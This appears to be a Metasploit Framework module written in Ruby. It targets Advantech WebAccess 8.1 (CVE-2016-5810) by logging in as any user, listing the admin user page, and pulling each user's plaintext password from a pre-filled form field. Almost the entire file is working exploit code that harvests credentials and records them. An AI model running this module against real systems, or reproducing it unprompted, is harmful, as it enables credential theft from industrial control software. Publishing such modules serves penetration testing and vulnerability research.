GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/auxiliary/gather/advantech_webaccess_creds.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
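class MetasploitModule < Msf::Auxiliary
  include Msf::Exploit::Remote::HttpClient

  def initialize(info = {})
    super(update_info(info,
      'Name' => "Advantech WebAccess 8.1 Post Authentication Credential Collector",
      'Description' => %q{
        This module allows you to log into Advantech WebAccess 8.1, and collect all of the credentials.
        Although authentication is required, any level of user permission can exploit this vulnerability.

        Note that 8.2 is not suitable for this.
      },
      'License' => MSF_LICENSE,
      'Author' =>
        [
          'h00die', # Pointed out the obvious during a PR review for CVE-2017-5154
          'sinn3r', # Metasploit module
        ],
      'References' =>
        [
          ['CVE', '2016-5810'],
          ['URL', 'https://github.com/rapid7/metasploit-framework/pull/7859#issuecomment-274305229']
        ],
      'DisclosureDate' => '2017-01-21'
    ))

    register_options(
      [
        OptString.new('WEBACCESSUSER', [true, 'Username for Advantech WebAccess', 'admin']),
        OptString.new('WEBACCESSPASS', [false, 'Password for Advantech WebAccess', '']),
        OptString.new('TARGETURI', [true, 'The base path to Advantech WebAccess', '/']),
      ])
  end

  # Signs in to WebAccess with the configured WEBACCESSUSER / WEBACCESSPASS.
  #
  # A successful login is recognised by the server answering with a
  # Location header of /broadweb/bwproj.asp; the credential is then recorded
  # via #report_cred and the ASP session cookie is extracted from the reply.
  #
  # @return [String, nil] the "ASPSESSIONIDxxx=yyy" cookie pair ("" when the
  #   login succeeded but no such cookie was set), or nil when the login failed
  # @raise [Msf::Exploit::Failed] via fail_with when no response is received
  def do_login
    vprint_status("Attempting to login as '#{datastore['WEBACCESSUSER']}:#{datastore['WEBACCESSPASS']}'")

    uri = normalize_uri(target_uri.path, 'broadweb', 'user', 'signin.asp')

    res = send_request_cgi({
      'method' => 'POST',
      'uri' => uri,
      'vars_post' => {
        'page' => '/',
        'pos' => '',
        'username' => datastore['WEBACCESSUSER'],
        'password' => datastore['WEBACCESSPASS'],
        'remMe' => '',
        'submit1' => 'Login'
      }
    })

    fail_with(Failure::Unreachable, 'Connection timed out while trying to login') unless res

    # Anything other than the post-login redirect is treated as a failed login.
    unless res.headers['Location'] == '/broadweb/bwproj.asp'
      print_error("Unable to login as '#{datastore['WEBACCESSUSER']}:#{datastore['WEBACCESSPASS']}'")
      return nil
    end

    print_good("Logged in as #{datastore['WEBACCESSUSER']}")
    report_cred(
      user: datastore['WEBACCESSUSER'],
      password: datastore['WEBACCESSPASS'],
      status: Metasploit::Model::Login::Status::SUCCESSFUL
    )

    # Only the ASP session cookie is needed for the follow-up requests.
    res.get_cookies.scan(/(ASPSESSIONID\w+=\w+);/).flatten.first || ''
  end

  # Fetches the admin user-edit page for +user+ and reads the value the
  # server pre-fills into the "Password" input.
  #
  # @param sid [String] session cookie returned by #do_login
  # @param user [String] WebAccess username to look up
  # @return [String, nil] the password value, or nil when the request timed
  #   out, the page has no Password input, or that input has no value attribute
  def get_user_cred_detail(sid, user)
    vprint_status("Gathering password for user: #{user}")

    uri = normalize_uri(target_uri.path, 'broadWeb', 'user', 'upAdminPg.asp')

    res = send_request_cgi({
      'method' => 'GET',
      'uri' => uri,
      'cookie' => sid,
      'vars_get' => {
        'uname' => user
      }
    })

    unless res
      print_error("Unable to gather password for user #{user} due to a connection timeout")
      return nil
    end

    pass_field = res.get_html_document.at('input[@name="Password"]')
    return nil unless pass_field

    # An input without a value attribute would otherwise raise NoMethodError on #text.
    value_attr = pass_field.attributes['value']
    value_attr ? value_attr.text : nil
  end

  # Lists the usernames linked from the admin user page (AdminPg.asp).
  #
  # Every <a> whose href points at broadWeb/user/upAdminPg.asp?uname=... is
  # taken as a user entry; anchors without an href, or pointing elsewhere,
  # are skipped and duplicate names are collapsed so each user is queried once.
  #
  # @param sid [String] session cookie returned by #do_login
  # @return [Array<String>] URI-decoded usernames (may be empty)
  # @raise [Msf::Exploit::Failed] via fail_with when no response is received
  def get_users_page(sid)
    vprint_status("Checking user page...")

    uri = normalize_uri(target_uri.path, 'broadWeb', 'user', 'AdminPg.asp')

    res = send_request_cgi({
      'method' => 'GET',
      'uri' => uri,
      'cookie' => sid
    })

    fail_with(Failure::Unreachable, 'Connection timed out while checking AdminPg.asp') unless res

    html = res.get_html_document

    users = html.search('a').map do |anchor|
      href = anchor.attributes['href']
      next if href.nil? # <a> without href would raise on #text

      uname = href.text.scan(%r{broadWeb/user/upAdminPg\.asp\?uname=(.+)}).flatten.first
      uname ? Rex::Text.uri_decode(uname) : nil
    end

    users.compact.reject(&:blank?).uniq
  end

  # Stores a credential and its login record against the WebAccess service
  # on RHOST:RPORT in the current workspace.
  #
  # @param opts [Hash] :user, :password, :status (a
  #   Metasploit::Model::Login::Status value) and optional :proof
  # @return the result of create_credential_login
  def report_cred(opts)
    service_data = {
      address: rhost,
      port: rport,
      service_name: 'webaccess',
      protocol: 'tcp',
      workspace_id: myworkspace_id
    }

    credential_data = {
      origin_type: :service,
      module_fullname: fullname,
      username: opts[:user],
      private_data: opts[:password],
      private_type: :password
    }.merge(service_data)

    login_data = {
      last_attempted_at: DateTime.now,
      core: create_credential(credential_data),
      status: opts[:status],
      proof: opts[:proof]
    }.merge(service_data)

    create_credential_login(login_data)
  end

  # Module entry point: logs in, enumerates users, and records every
  # password that can be read from the user-edit page.
  def run
    cookie = do_login
    # do_login has already reported the failure; without a session there is
    # nothing to enumerate, so do not issue further requests with a nil cookie.
    return if cookie.nil?

    get_users_page(cookie).each do |user|
      pass = get_user_cred_detail(cookie, user)
      next unless pass

      report_cred(
        user: user,
        password: pass,
        status: Metasploit::Model::Login::Status::SUCCESSFUL,
        proof: 'AdminPg.asp'
      )
      print_good("Found password: #{user}:#{pass}")
    end
  end
end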